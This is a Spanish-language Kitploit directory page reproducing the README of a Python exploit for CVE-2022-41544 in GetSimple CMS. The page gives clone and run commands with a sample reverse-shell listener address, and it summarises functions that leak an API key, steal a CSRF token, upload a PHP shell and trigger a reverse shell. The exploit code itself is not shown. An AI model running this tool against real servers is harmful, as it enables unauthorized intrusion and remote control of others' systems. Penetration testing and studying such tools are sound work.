Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-41544 — Script de explotación en Python para CVE-2022-41544 en GetSimple CMS. Automatiza la fuga de claves API, la extracción de tokens CSRF, la subida de shells PHP y el disparo de reverse shells para pruebas de penetración. | Kitploit
Herramientas/GitHubGitHub/h3x0v3rl0rd/cve-2022-41544
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de Penetración
GitHubh3x0v3rl0rd/cve-2022-41544

CVE-2022-41544

Script de explotación en Python para CVE-2022-41544 en GetSimple CMS. Automatiza la fuga de claves API, la extracción de tokens CSRF, la subida de shells PHP y el disparo de reverse shells para pruebas de penetración.

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Script de Explotación CVE-2022-41544

Este repositorio contiene un script para explotar la vulnerabilidad CVE-2022-41544 en GetSimple CMS. El script realiza varios pasos para verificar vulnerabilidades, filtrar claves API, establecer cookies, obtener tokens CSRF, subir un shell y activar el shell.

Cambios y Mejoras

  1. Manejo de Advertencias de Obsolescencia: Se eliminó la importación obsoleta de telnetlib ya que no era necesaria para la funcionalidad del script.
  2. Manejo de Errores Mejorado: Se agregó un manejo de errores más robusto para las solicitudes HTTP y el análisis XML.
  3. Retroalimentación de Usuario Mejorada: Se proporcionó retroalimentación detallada para cada paso para ayudar a los usuarios a entender el progreso del script y cualquier problema encontrado.
  4. Validación de Entrada: Se aseguró que las entradas del usuario para el objetivo, la ruta y las credenciales estén validadas.
  5. Documentación y Comentarios: Se agregaron comentarios y documentación para mejorar la legibilidad y usabilidad del código.

Uso

  1. Clonar el Repositorio:

    root@kitploit:~
    git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
    cd CVE-2022-41544
    
  2. Instalar Dependencias: Asegúrate de tener Python 3 instalado junto con la librería .

requests
root@kitploit:~
pip3 install requests
  • Ejecutar el Script:

    root@kitploit:~
    python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
    
    • <target>: El dominio o dirección IP del objetivo.
    • <path>: La ruta a la instalación de GetSimple CMS.
    • <ip:port>: La IP y el puerto para la shell reversa.
    • <username>: El nombre de usuario administrador para GetSimple CMS.

    Ejemplo:

    root@kitploit:~
    python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin
    
  • image

    image

    Resumen del Script

    Funciones

    • print_the_banner(): Muestra un banner estilizado usando arte ASCII.
    • get_version(target, path): Verifica si la versión objetivo de GetSimple CMS es vulnerable.
    • api_leak(target, path): Intenta recuperar una clave API de un archivo XML de autorización.
    • set_cookies(username, version, apikey): Establece las cookies necesarias para solicitudes posteriores basadas en la clave API recuperada.
    • get_csrf_token(target, path, headers): Extrae un token CSRF necesario para subir un shell.
    • upload_shell(target, path, headers, nonce, shell_content): Sube un shell PHP al servidor objetivo.
    • shell_trigger(target, path): Activa el shell subido para establecer una conexión de shell reversa.

    Función Principal

    La función main() orquesta todo el proceso llamando a las funciones anteriores en secuencia para explotar la vulnerabilidad CVE-2022-41544.

    Autor

    Este script fue desarrollado por h3x0v3rl0rd.

    Aviso Legal

    Este script se proporciona solo con fines educativos. El acceso no autorizado a sistemas es ilegal y poco ético. Usa este script de manera responsable y solo en sistemas en los que tengas permiso explícito para realizar pruebas.

    Licencia

    Este proyecto está licenciado bajo la Licencia MIT - consulta el archivo LICENSE para más detalles.

    Descargar herramienta